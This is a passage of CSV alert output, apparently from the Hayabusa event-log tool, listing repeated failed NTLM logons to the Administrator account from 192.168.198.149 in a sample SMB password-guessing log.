+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7QMbzSuGuzzMK0v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.174 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJUynF5bN1Oj0vaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.221 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dg4ZtybY5BnPN0nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.269 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gRmRV9ct3hor8Muk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.313 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QRjaP1mj9FgKsGBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.363 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CCzzatQ195mcxQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJPIrtk5GBAhsUlR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 720RHwyXQcxvsJBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.606 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GofmHRstuhljMDOL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.649 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wQUQ4INktwXwRkaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WHs5hduf7SmUcLK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gdo1txjJXiRLbUDH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.785 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JK8jP3ftKQOyutGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdbEjo88dBJRhrKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.929 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZCVkXkwhbuSM654 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z2mc9WScfBa88rtO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.011 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lee7qYLkXQoz8rRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.057 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g1ZKpZuZU1WRoC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.108 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4ST7RrHJxAQHHbn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GtW1hBHF97YqvN4N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.189 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVKlPytPofO9LQBm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.235 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GOkZ9yjvfL51UYXo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAxfxSbRqGO7Dej0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.313 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D7XmvDYk6zFLir09 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.355 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mWcl6CKdSMxd8edZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SxBQlFZvGBqDdobn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.435 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXN94VanwME6q8rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.467 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOj7CZ3stJXePY8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.513 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXjmqxguFGL3f8cV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHWmdxnRrMbxrdlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.681 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ROBnjuyHn4FRugk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.754 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zGxuUxasL680O21l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.812 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYoM984EzAkUtBoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.857 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0e3ATNpzeeAf6Qax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.889 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1A0dGhpVy8kgiRP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.935 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGgNAKJM5RAt9B5K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:28.981 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c3DpedXujvQpZnjQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.019 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BsaSjESaUHbsIxJL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.062 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ca4dlxyEco3VOapw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.100 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6lJc7DXAOcNZ2G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.144 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Olt5mS7na07VDJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.185 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCFeQcUMDTs0ev8v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.233 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYmH6CQrizoZ1DAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.285 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iYtujXkzySwZQFk8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.327 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KE9v6wzrebvjvDIl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.365 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81gmRFFBHI1s4dqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.409 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C8gHWPDjQM8M3tiQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.442 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: szj4mJvtFV06CuR2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.493 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ceGEl87hOM0InAAd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.541 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XRv3C3rRxYXTgckj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.581 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TaPkJPIQnbL3VyUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.618 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZ7PZAT6hWWHNc29 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.664 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJVD4uVhwfLSJ6Ab | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6KME1I6tE0v9UAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.751 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Qtt1rk4n3tOJko2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: prPsA8EZHGfGPSHm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQqGXnwHtB87LSzT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.870 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6uLT1bjaIS0XBsWC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.921 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIgpraQTxFrcLphN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.957 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1D6qy57XImq4prx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:29.992 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Kw44Ffh4DIPlyuM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oKUdmKU74RmJysAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZUTzZw0T1tYRSP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.127 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nEOfjuAMa7HTsfcP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.243 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e7bG19emMTmyBQNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.332 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YsLkgWukfqS3wWJK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.373 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: liFcZjjpY3xXwe9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.422 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBUgbfzx2OEcOxWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.475 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVCV0WoZmLTFNH71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.516 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJmxGOqck4oQi1kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.561 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w7lYqaUvEtTp18DK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ9xQmGn61JJDeQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.649 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XuMXpvY9fmLm0eBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ofesuNErTLWuN0k4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsNq7SThd3b8oTwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.797 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmRWg5gNRcxDMFjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JXrGn6LehVwTGNNj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:30.880 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIq9DS71jCjWbgdY | IP Addr: 192.168.198.149 | AuthPackage: 